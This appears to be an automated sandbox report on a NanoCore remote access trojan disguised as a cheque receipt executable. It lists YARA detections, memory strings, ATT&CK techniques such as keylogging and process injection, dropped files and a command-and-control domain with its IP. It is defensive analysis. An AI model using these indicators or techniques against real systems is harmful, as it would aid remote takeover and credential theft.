Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508936051.0000000005D8C000.00000004.00000001.sdmp	Binary or memory string: Program Manager4
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.503553723.00000000028DD000.00000004.00000001.sdmp	Binary or memory string: Program ManagerHa

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 1_2_0040208D cpuid

1_2_0040208D

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 1_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00401B74

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403486

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282659839.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.504663155.0000000003563000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501596655.00000000024D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: CHEQUE COPY RECEIPT.exe, 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CHEQUE COPY RECEIPT.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: CHEQUE COPY RECEIPT.exe, 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: CHEQUE COPY RECEIPT.exe	String found in binary or memory: NanoCore.ClientPluginHost
Source: CHEQUE COPY RECEIPT.exe, 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282659839.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.504663155.0000000003563000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501596655.00000000024D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Scheduled Task/Job1	Access Token Manipulation1	Disable or Modify Tools1	Input Capture11	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Process Injection112	Deobfuscate/Decode Files or Information11	LSASS Memory	File and Directory Discovery2	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Scheduled Task/Job1	Obfuscated Files or Information3	Security Account Manager	System Information Discovery25	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing42	NTDS	Security Software Discovery131	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading2	LSA Secrets	Virtualization/Sandbox Evasion3	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol21	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion3	Cached Domain Credentials	Process Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
CHEQUE COPY RECEIPT.exe	40%	Virustotal	Browse
CHEQUE COPY RECEIPT.exe	25%	ReversingLabs
CHEQUE COPY RECEIPT.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	25%	ReversingLabs
C:\Users\user\AppData\Local\Temp\9mqal9z8w5l9du.dll	15%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nscD29E.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsfF3F1.tmp\System.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsfF3F1.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack	100%	Avira	TR/NanoCore.fadte	Download File
12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
chinomso.duckdns.org	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
chinomso.duckdns.org	8%	Virustotal		Browse
chinomso.duckdns.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
chinomso.duckdns.org	185.150.24.55	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
